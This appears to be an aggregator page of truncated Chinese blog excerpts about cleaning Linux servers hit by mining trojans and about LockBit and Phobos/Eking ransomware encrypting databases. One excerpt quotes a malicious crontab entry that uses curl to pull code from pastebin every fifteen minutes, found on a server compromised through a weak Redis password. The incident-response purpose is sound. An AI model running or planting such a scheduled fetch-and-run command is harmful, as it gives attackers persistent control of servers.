...

linux服务器中病毒后的清除处理 之前看到公司同事在部署服务器的时候，发现中了挖矿病毒，很是恼火。因为我平时很少接触服务器，一般都是部署项目，配置域名就完事。所以遇到这种情况，只能在一旁看着干着急。后来在网上查阅了很多资料，现决定来整理一下，下次如果遇到服务器中病毒的情况，可以拿来 ...

这几天阿里云云服务器cpu一直跑满，一查发现有个定时任务，在搜索一下，发现自己中毒了，原来前几天搞redis学习的时候设置了个弱密码，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

　　背景：客户服务器被挂载木马病毒用以挖矿(比特币)。 　　本次清理通过Linux基本命令完成。其原理也比较简单，通过ps命令查看服务器异常进程，然后通过lsof命令定位进程访问的文件，找到异常文件删除之，最后为了确保万无一失，可以通过find命令找出最近时间内服务器上产生的文件进一步排除 ...

在内网的正式服务器被植入病毒，以前总觉得有点遥远，可是今天发生的事情让我对此有了新的认识，真是没有绝对安全。 开了一早上的会议，下午就开始梳理各种资料并筹备明天开会的内容。结果突然接到手下人员反馈，正式系统访问出现乱码问题，及时登上服务器进行查看系统日志 ...

1. 前言 昨天邮件收到如下图所示： 啊，天啊，对于一个做前端开发的人来说，对服务器端的知识只略懂一二啊，黑客就知道欺负小白，入侵我的服务器。 一开始我是束手无策的，根本无从所知病毒在哪，黑客怎么入侵我的服务器。接下来，让我们一步步来排查吧，先看看如何判断 Linux 服务器是否被入侵？ 2. ...

近日接到很多扩展名.LOCKBIT勒索病毒加密的数据库文件, 服务器 SQL数据库 mysql数据库 oracle数据库等都是重点目标。 平时要多注意防范,数据库备份及时拷贝走。如果不幸中招被加密了数据 可以尝试下 下面这些杀毒软件网站有无适合您的解密工具 ...

近日 Phobos 勒索软件家族Eking勒索病毒较活跃，今天接到一个oracle数据库 勒索病毒加密的案例, 由于DBF文件被全加密，但是可以从加密的DMP备份文件恢复。可以解决问题。 下面是 该病毒的一些资料 Eking属于 Phobos 勒索软件家族。它对文件进行加密，重命名并生成 ...